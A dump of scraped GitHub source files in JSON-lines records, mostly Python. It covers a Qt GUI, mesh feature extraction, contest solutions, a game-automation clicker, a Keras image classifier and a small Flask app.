Qt.Unchecked\n item.setCheckState(check_state)\n #DEBUG_COL_DTYPE(col, 'bool')\n #item.setData(Qt.DisplayRole, bool(data))\n # INTEGER DATA\n elif tools.is_int(data):\n item.setData(Qt.DisplayRole, int(data))\n #DEBUG_COL_DTYPE(col, 'int')\n # FLOAT DATA\n elif tools.is_float(data):\n item.setData(Qt.DisplayRole, float(data))\n #DEBUG_COL_DTYPE(col, 'float')\n # STRING DATA\n else:\n item.setText(str(data))\n #DEBUG_COL_DTYPE(col, 'string')\n # Mark as editable or not\n if col_editable[col]:\n item.setFlags(item.flags() | Qt.ItemIsEditable)\n item.setBackground(QtWidgets.QColor(250, 240, 240))\n else:\n item.setFlags(item.flags() ^ Qt.ItemIsEditable)\n item.setTextAlignment(Qt.AlignHCenter)\n tbl.setItem(row, col, item)\n\n #print(dbg_col2_dtype)\n tbl.setSortingEnabled(True)\n tbl.sortByColumn(sort_col, sort_ord) # Move back to old sorting\n tbl.show()\n tbl.blockSignals(tblWasBlocked)\n\n def isItemEditable(self, item):\n return int(Qt.ItemIsEditable & item.flags()) == int(Qt.ItemIsEditable)\n\n #=======================\n # General Table Getters\n #=======================\n\n def get_tbl_header(front, tbl, col):\n # Map the fancy header back to the internal one.\n fancy_header = str(tbl.horizontalHeaderItem(col).text())\n header = (front.back.reverse_fancy[fancy_header]\n if fancy_header in front.back.reverse_fancy else fancy_header)\n return header\n\n def get_tbl_int(front, tbl, row, col):\n return int(tbl.item(row, col).text())\n\n def get_tbl_str(front, tbl, row, col):\n return str(tbl.item(row, col).text())\n\n def get_header_val(front, tbl, header, row):\n # RCOS TODO: This is hacky. These just need to be\n # in dicts to begin with.\n tblname = str(tbl.objectName()).replace('_TBL', '')\n tblname = tblname.replace('image', 'img') # Sooooo hack\n # TODO: backmap from fancy headers to consise\n col = front.back.table_headers[tblname].index(header)\n return tbl.item(row, col).text()\n\n #=======================\n # Specific Item Getters\n #=======================\n\n def get_chiptbl_header(front, col):\n return front.get_tbl_header(front.ui.cxs_TBL, col)\n\n def get_imgtbl_header(front, col):\n return front.get_tbl_header(front.ui.gxs_TBL, col)\n\n def get_restbl_header(front, col):\n return front.get_tbl_header(front.ui.res_TBL, col)\n\n def get_nametbl_header(front, col):\n return front.get_tbl_header(front.ui.nxs_TBL, col)\n\n def get_restbl_cid(front, row):\n return int(front.get_header_val(front.ui.res_TBL, 'cid', row))\n\n def get_chiptbl_cid(front, row):\n return int(front.get_header_val(front.ui.cxs_TBL, 'cid', row))\n\n def get_nametbl_name(front, row):\n return str(front.get_header_val(front.ui.nxs_TBL, 'name', row))\n\n def get_nametbl_nx(front, row):\n return int(front.get_header_val(front.ui.nxs_TBL, 'nx', row))\n\n def get_imgtbl_gx(front, row):\n return int(front.get_header_val(front.ui.gxs_TBL, 'gx', row))\n\n #=======================\n # Table Changed Functions\n #=======================\n\n @slot_(QTableWidgetItem)\n def img_tbl_changed(front, item):\n front.print('img_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_gx = front.get_imgtbl_gx(row)\n header_lbl = front.get_imgtbl_header(col)\n new_val = item.checkState() == Qt.Checked\n front.changeGxSignal.emit(sel_gx, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def chip_tbl_changed(front, item):\n front.print('chip_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_cid = front.get_chiptbl_cid(row) # Get selected chipid\n new_val = csv_sanatize(item.text()) # sanatize for csv\n 
header_lbl = front.get_chiptbl_header(col) # Get changed column\n front.changeCidSignal.emit(sel_cid, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def res_tbl_changed(front, item):\n front.print('res_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_cid = front.get_restbl_cid(row) # The changed row's chip id\n new_val = csv_sanatize(item.text()) # sanatize val for csv\n header_lbl = front.get_restbl_header(col) # Get changed column\n front.changeCidSignal.emit(sel_cid, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def name_tbl_changed(front, item):\n front.print('name_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_nx = front.get_nametbl_nx(row) # The changed row's name index\n new_val = csv_sanatize(item.text()) # sanatize val for csv\n header_lbl = front.get_nametbl_header(col) # Get changed column\n front.aliasNameSignal.emit(sel_nx, header_lbl, new_val)\n\n #=======================\n # Table Clicked Functions\n #=======================\n @slot_(QTableWidgetItem)\n @clicked\n def img_tbl_clicked(front, item):\n row = item.row()\n front.print('img_tbl_clicked(%r)' % (row))\n sel_gx = front.get_imgtbl_gx(row)\n front.selectGxSignal.emit(sel_gx)\n\n @slot_(QTableWidgetItem)\n @clicked\n def chip_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('chip_tbl_clicked(%r, %r)' % (row, col))\n sel_cid = front.get_chiptbl_cid(row)\n front.selectCidSignal.emit(sel_cid)\n\n @slot_(QTableWidgetItem)\n @clicked\n def res_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('res_tbl_clicked(%r, %r)' % (row, col))\n sel_cid = front.get_restbl_cid(row)\n front.selectResSignal.emit(sel_cid)\n\n @slot_(QTableWidgetItem)\n @clicked\n def name_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('name_tbl_clicked(%r, %r)' % (row, col))\n sel_name = front.get_nametbl_name(row)\n front.selectNameSignal.emit(sel_name)\n\n #=======================\n # Other\n #=======================\n\n @slot_(int)\n def change_view(front, new_state):\n tab_name = str(front.ui.tablesTabWidget.tabText(new_state))\n front.print('change_view(%r)' % new_state)\n prevBlock = front.ui.tablesTabWidget.blockSignals(True)\n front.ui.tablesTabWidget.blockSignals(prevBlock)\n if tab_name.startswith('Query Results Table'):\n print(front.back.hs.get_cache_uid())\n\n @slot_(str, str, list)\n def modal_useroption(front, msg, title, options):\n pass\n\n @slot_(str)\n def gui_write(front, msg_):\n app = front.back.app\n outputEdit = front.ui.outputEdit\n # Write msg to text area\n outputEdit.moveCursor(QtGui.QTextCursor.End)\n # TODO: Find out how to do backspaces in textEdit\n msg = str(msg_)\n if msg.find('\\b') != -1:\n msg = msg.replace('\\b', '') + '\\n'\n outputEdit.insertPlainText(msg)\n if app is not None:\n app.processEvents()\n\n @slot_()\n def gui_flush(front):\n app = front.back.app\n if app is not None:\n app.processEvents()\n #front.ui.outputEdit.moveCursor(QtGui.QTextCursor.End)\n #front.ui.outputEdit.insertPlainText(msg)\n","repo_name":"Erotemic/hotspotter","sub_path":"hsgui/guifront.py","file_name":"guifront.py","file_ext":"py","file_size_in_byte":27368,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"35504819700","text":"import sys\nimport math\n\n# Parse command-line arguments\nif len(sys.argv) != 3:\n print(\"Usage: python adjacency_connectivity.py \")\n sys.exit()\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\n\n# Read the input 
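Editor's note on the guifront.py record above — the StreamStealer/GUILoggingHandler machinery boils down to one pattern: replace sys.stdout with an object whose write() re-emits text as a Qt signal (so a text widget can display it from the GUI thread), optionally echoing to the original stream, which is what the "share" mode does. A minimal self-contained PyQt5 sketch of that pattern; the class and attribute names are mine:

import sys
from PyQt5 import QtCore

class StdoutToSignal(QtCore.QObject):
    text_written = QtCore.pyqtSignal(str)

    def __init__(self, echo=True):
        super().__init__()
        self._real_stdout = sys.stdout  # remember the stolen stream
        self._echo = echo
        sys.stdout = self               # steal it

    def write(self, msg):
        if self._echo:
            self._real_stdout.write(msg)  # "share" mode keeps console output
        self.text_written.emit(str(msg))

    def flush(self):
        self._real_stdout.flush()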
image file line by line\nwith open(input_file, 'r') as f:\n lines = f.readlines()\n\n# Extract the image dimensions and pixel values\nassert lines[0].startswith('P2')\nwidth, height = map(int, lines[2].split())\nmax_value = int(lines[3])\npixels = [[int(int(val) >= 128) for val in line.split()] for line in lines[4:]]\n\n# Define the coordinates of two pixels to compare\nx1, y1 = 10, 10\nx2, y2 = 20, 20\n\n# Check adjacency between the two pixels\ndx, dy = abs(x1 - x2), abs(y1 - y2)\ndist = math.sqrt(dx**2 + dy**2)\nif dist == 1:\n print(\"The two pixels are 4-adjacent.\")\nelif dist == math.sqrt(2):\n print(\"The two pixels are 8-adjacent.\")\nelse:\n print(\"The two pixels are m-adjacent.\")\n\n# Check connectivity between the two pixels\nvisited = [[False]*width for _ in range(height)]\nstack = [(x1, y1)]\nvisited[y1][x1] = True\nconnected = False\nwhile stack:\n x, y = stack.pop()\n if x == x2 and y == y2:\n connected = True\n break\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n new_x, new_y = x + dx, y + dy\n if 0 <= new_x < width and 0 <= new_y < height and not visited[new_y][new_x] and pixels[new_y][new_x]:\n visited[new_y][new_x] = True\n stack.append((new_x, new_y))\n\nif connected:\n print(\"The two pixels are connected.\")\nelse:\n print(\"The two pixels are not connected.\")\n\n# Compute the digital path between the two pixels\nif connected:\n path = []\n x, y = x1, y1\n dx, dy = x2 - x1, y2 - y1\n sx, sy = 1 if dx > 0 else -1, 1 if dy > 0 else -1\n dx, dy = abs(dx), abs\n\n","repo_name":"ImDarkShadow/UnivSemThree","sub_path":"Pixel Connectivity.py","file_name":"Pixel Connectivity.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16890278056","text":"import logging\nimport math\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport trimesh\nfrom matplotlib.ticker import PercentFormatter\nfrom scipy.spatial.distance import cdist\nfrom trimesh import convex\n\nimport utils\n\ntrimesh.util.attach_to_log()\nlogging.getLogger('matplotlib.font_manager').disabled = True\n\n\ndef volume(mesh):\n v1s = mesh.vertices[mesh.faces][::, 0] - mesh.centroid\n v2s = mesh.vertices[mesh.faces][::, 1] - mesh.centroid\n v3s = mesh.vertices[mesh.faces][::, 2] - mesh.centroid\n v = 1 / 6 * np.abs(np.sum(np.cross(v1s, v2s) * v3s))\n return v\n\n\ndef compactness(mesh):\n if mesh.area > 0:\n c = np.divide(np.power(mesh.area, 3), (36 * np.pi * np.power(volume(mesh), 2)))\n else:\n c = 0\n return c if not np.isnan(c) else 0\n\n\ndef diameter(mesh):\n try:\n conv_hull_points = trimesh.convex.hull_points(mesh)\n d = np.max(cdist(conv_hull_points, conv_hull_points, metric='euclidean'))\n except:\n print(\"error calculating hull, reverting to brute force diameter calculation\")\n d = np.max(cdist(mesh.vertices, mesh.vertices, metric='euclidean'))\n\n return d\n\n\ndef eccentricity(mesh):\n values, _ = utils.eigen_values_vectors(mesh)\n ecc = values[np.argmin(values)] / values[np.argmax(values)]\n return ecc\n\n\ndef barycentre_distance(mesh):\n return np.sqrt(np.sum(mesh.centroid * mesh.centroid))\n\n\ndef bounding_box_volume(mesh):\n x = mesh.bounds\n volume = (x[1][0] - x[0][0]) * (x[1][1] - x[0][1]) * (x[1][2] - x[0][2])\n return volume\n\n\ndef merge_bins():\n df = utils.read_excel(original=False)\n for column in df[utils.hist_features]:\n values = np.asarray(df[column])\n newvalues = list(map(lambda x: x[np.arange(0, 20, step=2)] + x[np.arange(1, 21, 
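Editor's note on the pixel-connectivity record above — the file breaks off mid-statement while computing the digital path ("dx, dy = abs(dx), abs"), and the DFS before it only answers yes/no. A hedged sketch that records predecessors during a 4-connected BFS so the actual digital path can be reconstructed; pixels are indexed [y][x] as in the original:

from collections import deque

def digital_path(pixels, start, goal, width, height):
    # BFS over foreground pixels, remembering each pixel's predecessor.
    prev = {start: None}
    queue = deque([start])
    while queue:
        x, y = queue.popleft()
        if (x, y) == goal:
            path, node = [], goal
            while node is not None:      # walk predecessors back to start
                path.append(node)
                node = prev[node]
            return path[::-1]
        for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nx, ny = x + dx, y + dy
            if (0 <= nx < width and 0 <= ny < height
                    and (nx, ny) not in prev and pixels[ny][nx]):
                prev[(nx, ny)] = (x, y)
                queue.append((nx, ny))
    return None  # the two pixels are not connected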
step=2)], values))\n df[column] = newvalues\n utils.save_excel(df, original=False)\n\n\ndef filter_database(dbPath, excelPath, picklePath, features=True):\n db = dbPath\n df = pd.DataFrame()\n utils.ensure_dir(excelPath)\n utils.ensure_dir(picklePath)\n index_to_class, class_sizes = utils.class_dictionaries()\n # iterate over all models:\n for classFolder in os.listdir(db):\n for modelFolder in os.listdir(db + '/' + classFolder):\n for filename in os.listdir(db + '/' + classFolder + '/' + modelFolder):\n if filename.endswith('.off'):\n # Find the relevant info for the mesh:\n file_number = int(filename[1:-4])\n shape_class = index_to_class[file_number]\n if shape_class in class_sizes:\n path = db + '/' + classFolder + '/' + modelFolder + '/' + filename\n mesh = trimesh.load(path, force='mesh')\n mesh_info = fill_mesh_info(mesh, shape_class, path, features)\n df = df.append(mesh_info, ignore_index=True)\n\n df.to_excel(excelPath)\n df.to_pickle(picklePath)\n\n\ndef make_bins(list, lowerbound, upperbound, nrbins, plot):\n if plot:\n return list, {\"blocksize\": (upperbound / nrbins), \"xlim\": lowerbound, \"ylabel\": \"Percentage\"}\n bins = np.histogram(list, bins=nrbins, range=(lowerbound, upperbound), density=True)\n\n return bins[0]\n\n\ndef select_random_number_expection(exclude, selected_vertices):\n if len(exclude) == 1:\n new_list = [el for el in selected_vertices if not np.array_equal(el, exclude[0])]\n return new_list[np.random.randint(0, high=len(new_list))]\n\n\ndef check_duplicates(mesh, selected_vertices, number_vertices):\n for idx, vertice in enumerate(selected_vertices):\n if number_vertices < 2:\n if np.array_equal(vertice[0], vertice[1]):\n selected_vertices[idx, 0] = select_random_number_expection(vertice[0], mesh.vertices)\n if number_vertices < 3:\n continue\n\n if np.array_equal(vertice[0], vertice[2]):\n selected_vertices[idx, 0] = select_random_number_expection(vertice[0], mesh.vertices)\n if np.array_equal(vertice[1], vertice[2]):\n selected_vertices[idx, 1] = select_random_number_expection(vertice[1], mesh.vertices)\n\n if number_vertices < 4:\n continue\n\n if np.array_equal(vertice[0], vertice[3]):\n selected_vertices[idx, 0], select_random_number_expection(vertice[0], mesh.vertices)\n if np.array_equal(vertice[2], vertice[3]):\n selected_vertices[idx, 2], select_random_number_expection(vertice[2], mesh.vertices)\n if np.array_equal(vertice[1], vertice[3]):\n selected_vertices[idx, 1], select_random_number_expection(vertice[1], mesh.vertices)\n\n return selected_vertices\n\n\ndef A3(mesh, amount=utils.hist_amount, plot=False):\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 3))]\n random_vertices = check_duplicates(mesh, random_vertices, 3)\n angles = np.arccos(\n np.clip(np.sum(utils.unit_vector(np.subtract(random_vertices[::, 0], random_vertices[::, 1]), transpose=True) *\n utils.unit_vector(np.subtract(random_vertices[::, 0], random_vertices[::, 2]), transpose=True),\n axis=1), -1.0, 1.0))\n return make_bins(angles, 0, math.pi, utils.nr_bins_hist, plot)\n\n\ndef D1(mesh, amount=utils.target_vertices, plot=False):\n # Distance barycentre to random vertice\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount))]\n distance_barycentre = np.sqrt(np.sum(np.power(random_vertices, 2), axis=1))\n return make_bins(distance_barycentre, 0, 0.75, utils.nr_bins_hist, plot)\n\n\ndef D2(mesh, amount=utils.hist_amount, plot=False):\n # Distance between two random vertices\n random_vertices = 
mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 2))]\n random_vertices = check_duplicates(mesh, random_vertices, 2)\n distance_vertices = np.sqrt(np.sum(np.power(random_vertices[::, 0] - random_vertices[::, 1], 2), axis=1))\n return make_bins(distance_vertices, 0, 1, utils.nr_bins_hist, plot)\n\n\ndef D3(mesh, amount=utils.hist_amount, plot=False):\n # Root of area of triangle given by three random vertices\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 3))]\n random_vertices = check_duplicates(mesh, random_vertices, 3)\n area_vertices = np.sqrt(np.sqrt(np.sum(\n np.power(np.cross(random_vertices[::, 0] - random_vertices[::, 2], random_vertices[::, 1] - random_vertices[::, 2]),\n 2), axis=1)) / 2)\n return make_bins(area_vertices, 0, 2 / 3, utils.nr_bins_hist, plot)\n\n\ndef D4(mesh, amount=utils.hist_amount, plot=False):\n # Cubic root of volume of tetahedron given by four random vertices\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 4))]\n random_vertices = check_duplicates(mesh, random_vertices, 4)\n vectors1 = random_vertices[::, 0] - random_vertices[::, 3]\n vectors2 = random_vertices[::, 1] - random_vertices[::, 3]\n vectors3 = random_vertices[::, 2] - random_vertices[::, 3]\n volumes = np.power(np.divide(np.absolute(np.sum(vectors1 * (np.cross(vectors2, vectors3)), axis=1)), 6), (1.0 / 3))\n return make_bins(volumes, 0, 0.6 * 0.55, utils.nr_bins_hist, plot)\n\n\ndef tetrahedon_volume(vertices):\n vector1 = vertices[0] - vertices[3]\n vector2 = vertices[1] - vertices[3]\n vector3 = vertices[2] - vertices[3]\n volume = abs(np.dot(vector1, (np.cross(vector2, vector3)))) / 6\n return volume\n\n\ndef AABB_volume(mesh):\n x = abs(mesh.bounds[0][0] - mesh.bounds[1][0])\n y = abs(mesh.bounds[0][1] - mesh.bounds[1][1])\n z = abs(mesh.bounds[0][2] - mesh.bounds[1][2])\n return x * y * z\n\n\ndef fill_mesh_info(mesh, shape_class, path, features=True):\n face_sizes = list(map(lambda x: len(x), mesh.faces))\n print(f\"analyzing model {path}\")\n if features:\n mesh_info = {\"class\": shape_class, \"nrfaces\": len(mesh.faces), \"nrvertices\": len(mesh.vertices),\n \"containsTriangles\": 3 in face_sizes, \"containsQuads\": 4 in face_sizes,\n \"bounding_box_corners\": mesh.bounds, \"path\": f'{path}',\n \"axis-aligned_bounding_box_volume\": AABB_volume(mesh),\n \"barycentre_distance\": barycentre_distance(mesh),\n \"volume\": volume(mesh),\n \"area\": mesh.area,\n \"eccentricity\": eccentricity(mesh),\n \"eigen_x_angle\": utils.eigen_angle(mesh),\n \"diameter\": diameter(mesh),\n \"compactness\": compactness(mesh),\n \"A3\": A3(mesh),\n \"D1\": D1(mesh),\n \"D2\": D2(mesh),\n \"D3\": D3(mesh),\n \"D4\": D4(mesh),\n \"area_faces\": mesh.area_faces}\n\n else:\n mesh_info = {\"class\": shape_class, \"nrfaces\": len(mesh.faces), \"nrvertices\": len(mesh.vertices),\n \"containsTriangles\": 3 in face_sizes, \"containsQuads\": 4 in face_sizes,\n \"bounding_box_corners\": mesh.bounds, \"path\": f'{path}',\n \"axis-aligned_bounding_box_volume\": np.linalg.norm(mesh.bounds[0] - mesh.bounds[1]),\n \"barycentre_distance\": barycentre_distance(mesh),\n \"volume\": volume(mesh),\n \"area\": mesh.area,\n \"eigen_x_angle\": utils.eigen_angle(mesh),\n \"area_faces\": mesh.area_faces\n }\n mesh_info = detect_outliers(mesh, mesh_info)\n return mesh_info\n\n\ndef detect_outliers(mesh, mesh_info):\n if len(mesh.vertices) < utils.target_vertices * 0.9:\n mesh_info[\"subsampled_outlier\"] = True\n 
mesh_info[\"supersampled_outlier\"] = False\n elif len(mesh.vertices) > utils.target_vertices * 1.1:\n mesh_info[\"supersampled_outlier\"] = True\n mesh_info[\"subsampled_outlier\"] = False\n else:\n mesh_info[\"subsampled_outlier\"] = False\n mesh_info[\"supersampled_outlier\"] = False\n return mesh_info\n\n\ndef meta_data(dataframe):\n # Calculate metadata on the datafram\n metadata = {}\n metadata[\"avgfaces\"] = np.mean(dataframe.loc[:, \"nrfaces\"].values)\n metadata[\"minfaces\"] = np.min(dataframe.loc[:, \"nrfaces\"].values)\n metadata[\"maxfaces\"] = np.max(dataframe.loc[:, \"nrfaces\"].values)\n\n metadata[\"avgvertices\"] = np.mean(dataframe.loc[:, \"nrvertices\"].values)\n metadata[\"minvertices\"] = np.min(dataframe.loc[:, \"nrvertices\"].values)\n metadata[\"maxvertices\"] = np.max(dataframe.loc[:, \"nrvertices\"].values)\n\n metadata[\"avgbarycentre_distance\"] = np.mean(dataframe.loc[:, \"barycentre_distance\"].values)\n metadata[\"volume\"] = np.mean(dataframe.loc[:, \"volume\"].values)\n return metadata\n\n\ndef histograms_all_classes(data, column):\n fig, axs = plt.subplots(5, 3, figsize=(20, 15))\n index_to_class, class_sizes = utils.class_dictionaries()\n for index, c in enumerate(class_sizes.keys()):\n for i in data.loc[data[\"class\"] == c, column]:\n axs[index % 5, int(index / 5)].plot(i)\n # axs[c % 6, int(c / 6)].xaxis.set_major_formatter(mtick.PercentFormatter(10))\n # axs[c % 6, int(c / 6)].yaxis.set_major_formatter(mtick.PercentFormatter(20000))\n axs[index % 5, int(index / 5)].set_title(c)\n\n fig.tight_layout()\n fig.savefig(utils.refinedImagePath + \"all_classes\" + column + '.png')\n\n\ndef save_histogram(data, info, path):\n # the histogram of the data\n\n # reset params\n plt.rcParams.update(plt.rcParamsDefault)\n plt.figure()\n # drop NA values if they exist\n if info['skip_outliers']:\n # Remove all data below the 5th percentile and 95th percentile\n p5 = np.percentile(data, 5)\n p95 = np.percentile(data, 95)\n data = data[data >= p5]\n data = data[data <= p95]\n if info[\"xlim\"] > 0:\n bins = np.arange(0, info[\"xlim\"], info[\"xlim\"] / info[\"blocksize\"])\n else:\n bins = info[\"blocksize\"]\n if 'column' in info and info['column'] == 'class':\n bins = np.concatenate([bins, [15.0]]) - 0.5\n plt.xlim(-0.5, info[\"xlim\"] - 0.5)\n plt.xticks(rotation=90)\n plt.subplots_adjust(bottom=0.34)\n plt.hist(data, bins=bins, facecolor='g', alpha=0.75)\n if info[\"ylim\"] > 0:\n plt.ylim(0, info[\"ylim\"])\n plt.xlabel(info[\"xlabel\"])\n plt.ylabel(info[\"ylabel\"])\n plt.title(info[\"title\"])\n if info[\"xlim\"] != 0 and not ('column' in info and info['column'] == 'class'):\n plt.xlim(0, info[\"xlim\"])\n # plt.grid(True)\n plt.gcf().subplots_adjust(left=0.15)\n utils.ensure_dir(path)\n plt.savefig(path + info[\"title\"] + '.png')\n plt.clf()\n plt.cla()\n\n\ndef save_all_histograms(df, path, features=False):\n plotInfos = [\n {\"column\": \"class\", \"title\": \"Class distribution\", \"blocksize\": 15, \"xlim\": 15, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Class name\", \"skip_outliers\": False},\n {\"column\": \"nrfaces\", \"title\": \"Face distribution\", \"blocksize\": 25, \"xlim\": 0, \"ylim\": 750, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Number of faces\", \"skip_outliers\": True},\n {\"column\": \"nrvertices\", \"title\": \"Vertice distribution\", \"blocksize\": 25, \"xlim\": 0, \"ylim\": 800,\n \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Number of vertices\", \"skip_outliers\": True},\n {\"column\": \"volume\", \"title\": \"Mesh volume\", 
\"blocksize\": 15, \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Mesh volume\", \"skip_outliers\": True},\n {\"column\": \"barycentre_distance\", \"title\": \"Barycentre origin distance\", \"blocksize\": 20, \"xlim\": 1, \"ylim\": 1400,\n \"ylabel\": \"#Meshes\", \"xlabel\": \"Distance barycentre to origin\", \"skip_outliers\": False},\n {\"column\": \"axis-aligned_bounding_box_volume\", \"title\": \"Axis-aligned bounding box volume\", \"blocksize\": 15,\n \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\", \"xlabel\": \"Volume of axis aligned bounding box\",\n \"skip_outliers\": False},\n {\"column\": \"eigen_x_angle\", \"ylim\": 1400, \"title\": \"Angle largest eigenvector - x-axis\", \"blocksize\": 15,\n \"xlim\": 3.2, \"ylabel\": \"#Meshes\", \"xlabel\": \"Radian angle between largest eigenvector and x-axis\",\n \"skip_outliers\": False},\n {\"column\": \"area\", \"title\": \"Mesh surface area\", \"blocksize\": 15,\n \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\", \"xlabel\": \"Total surface area of the mesh\", \"skip_outliers\": True}\n ]\n if features:\n plotInfos += [\n {\"column\": \"compactness\", \"title\": \"Compactness\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Compactness\", \"skip_outliers\": True},\n {\"column\": \"eccentricity\", \"title\": \"Eccentricity\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Eccentricity\", \"skip_outliers\": True},\n {\"column\": \"diameter\", \"title\": \"Diameter\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Diameter\", \"skip_outliers\": False}\n ]\n\n # Area_faces plot:\n all_areas = [values for values in df.loc[:, \"area_faces\"].values]\n all_areas = np.array([value for sublist in all_areas for value in sublist])\n plotinfo = {\"title\": \"Face area distribution over all meshes\", \"blocksize\": 25, \"xlim\": 0.0006, \"ylim\": 0,\n \"ylabel\": \"#faces\",\n \"xlabel\": \"face area\", \"skip_outliers\": True}\n save_histogram(all_areas, plotinfo, path)\n for info in plotInfos:\n save_histogram(df.loc[:, info['column']].values, info, path)\n\n\ndef plot_shape_properties(feature, shape, classes=1):\n path = utils.refinedImagePath\n mesh = trimesh.load(shape)\n # render([mesh])\n if feature == \"A3\":\n bins, info = A3(mesh, plot=True)\n title = \"Angle between three random points\"\n if feature == \"D1\":\n bins, info = D1(mesh, plot=True)\n title = \" Distance between the barycenter and a random point\"\n if feature == \"D2\":\n bins, info = D2(mesh, plot=True)\n title = \" Distance between two random point\"\n if feature == \"D3\":\n bins, info = D3(mesh, plot=True)\n title = \"Square root of the area of triangle made by three random point\"\n if feature == \"D4\":\n bins, info = D4(mesh, plot=True)\n title = \"Cube root of the volume of tetrahedron made by three random points\"\n plt.hist(bins, facecolor='g', alpha=0.75, weights=np.ones(len(bins)) / len(bins))\n plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n plt.xlabel(feature)\n plt.ylabel(info[\"ylabel\"])\n # plt.title(title + \" of class\" + classes[classes])\n plt.savefig(path + feature + shape[-8:-4] + '.png')\n # plt.show()\n\n\ndef visualize_difference_features():\n plot_shape_properties(feature=\"A3\", shape='testModels/refined_db/1/m102/m102.off', classes=1)\n plot_shape_properties(feature=\"A3\", shape='testModels/refined_db/1/m105/m105.off', classes=1)\n plot_shape_properties(feature=\"A3\", 
shape='testModels/refined_db/17/m1703/m1703.off', classes=17)\n\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/18/m1812/m1812.off')\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/18/m1814/m1814.off')\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/9/m909/m909.off')\n\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/16/m1601/m1601.off')\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/16/m1600/m1600.off')\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/17/m1712/m1712.off')\n\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/14/m1402/m1402.off')\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/14/m1403/m1403.off')\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/13/m1306/m1306.off')\n\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/5/m500/m500.off')\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/5/m507/m507.off')\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/7/m704/m704.off')\n\n# mesh = trimesh.load('testModels/refined_db/1/m104/m104.off', force='mesh')\n# diameter(mesh)\n","repo_name":"myrthemh/MultimediaRetrieval","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":17351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11842762008","text":"#!/usr/bin/env python3\n\n#import\nimport math\n#import numpy as np\n#= int(input())\n#= input()\nS, P = map(int, input().split())\n\ndef is_ok(N):\n M = S - N\n return N * M <= P\n\ndef meguru_bisect(ok, ng):\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid):\n ok = mid\n else:\n ng = mid\n return ok\n\nans = meguru_bisect(1, S // 2 + 1)\n\nif ans * (S - ans) == P:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"Yukikazari/kyoupuro","sub_path":".提出一覧/AtCoder/arc108/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7134933758","text":"\nclass Solution:\n def removeElement(self, nums, val: int) -> int:\n i, j = 0, len(nums)-1\n\n while i self.threshold:\n return status\n return \"UnKnown\"\n\n def end_game(self):\n try:\n sys.exit(0)\n except Exception as e:\n print('运行结束')\n\n def my_sleep(self,sec):\n time_limits = sec\n start_times = time.time()\n while (time.time() - start_times) < time_limits:\n self.quit_game()\n return\n\n def quit_game(self):\n time_passed = (time.time() - self.start_time) / 60\n if (not self.quit) & (time_passed < int(self.time_limit)) & (self.count < int(self.count_limit)):\n return\n self.status_message = \"运行结束\"\n print(\"运行结束\")\n self.end_game()\n\n def start_game(self):\n self.win = win32gui.FindWindow(None, self.win_name)\n print(self.win_name)\n self.quit = False\n self.start_time = time.time()\n self.count = 0\n while (1):\n time_passed = (time.time() - self.start_time) / 60\n print(\"已运行 \", \"%.2f\" % time_passed, \" / \", self.time_limit, \"分钟 \", \"战斗:\", self.count, \" / \",\n self.count_limit, \" 次\")\n self.time_message = \"已运行 \"+ \"%.2f\" % time_passed+\" / \"+ str(self.time_limit)+ \"分钟 \\n\"+ \"战斗:\"+ 